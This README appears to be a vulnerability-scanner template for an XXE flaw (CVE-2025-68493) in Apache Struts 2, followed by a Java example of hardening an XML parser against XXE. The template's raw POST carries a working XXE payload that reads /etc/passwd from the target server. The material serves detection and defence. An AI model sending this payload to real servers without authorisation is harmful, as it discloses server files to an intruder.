README.md
```yaml
id: CVE-2025-68493

info:
  name: Apache Struts 2 - XML External Entity (XXE) Injection
  author: manus
  severity: high
  description: |
    Apache Struts 2 is vulnerable to XXE injection via the DomHelper.parse method.
    An attacker can exploit this to read arbitrary files from the server.
  reference:
    - https://zone.ci/secarticles/wx/486533.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-68493
  tags: cve,cve2025,struts2,xxe,apache

http:
  - raw:
      - |
        POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

        <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
```
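As an added illustration (not part of this template, and not code from the Struts project), the Java snippet below shows the parser configuration whose absence a template like this one detects: a stock `DocumentBuilderFactory`, which resolves DTD entities by default, next to one hardened against XXE. The class and method names (`XxeHardeningExample`, `newHardenedBuilder`, `hardenedParserRejects`) and the sample documents are constructed for this example; the constructed payload keeps the shape of the template's request body but points its SYSTEM identifier at a path that exists on no real host. The hardened builder rejects the DOCTYPE before any entity is resolved, which is the mitigation a defender wants in place regardless of which endpoint hands the document to the parser.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import org.xml.sax.SAXParseException;

public class XxeHardeningExample {

    // Unsafe baseline: a stock factory leaves DTD processing and external
    // entity resolution enabled. Shown only to contrast with the hardened form.
    static DocumentBuilder newDefaultBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened form (assumed configuration for this example): refuse any DOCTYPE
    // outright, and additionally disable external entities, external DTD loading,
    // XInclude and entity expansion in case a DOCTYPE ever gets through.
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns true when the hardened parser rejects the document with a parse
    // error (the expected outcome for any DOCTYPE-bearing input), false when it parses.
    static boolean hardenedParserRejects(String xml) throws Exception {
        try {
            newHardenedBuilder().parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXParseException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input: same structure as the template's payload, but
        // the SYSTEM identifier names a path that does not exist anywhere.
        String xxePayload = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///nonexistent/constructed-example\">]>"
            + "<foo>&xxe;</foo>";
        // Constructed benign document with no DOCTYPE at all.
        String benign = "<?xml version=\"1.0\"?><foo>hello</foo>";

        System.out.println("hardened parser rejects XXE payload:   " + hardenedParserRejects(xxePayload));
        System.out.println("hardened parser rejects benign input:  " + hardenedParserRejects(benign));
    }
}
```

The `disallow-doctype-decl` feature is the one that matters most: with it set, the parser raises a `SAXParseException` as soon as it sees the `<!DOCTYPE` token, so the `SYSTEM` identifier is never even examined. The remaining features are defence in depth for parsers that must accept internal DTDs for legitimate reasons.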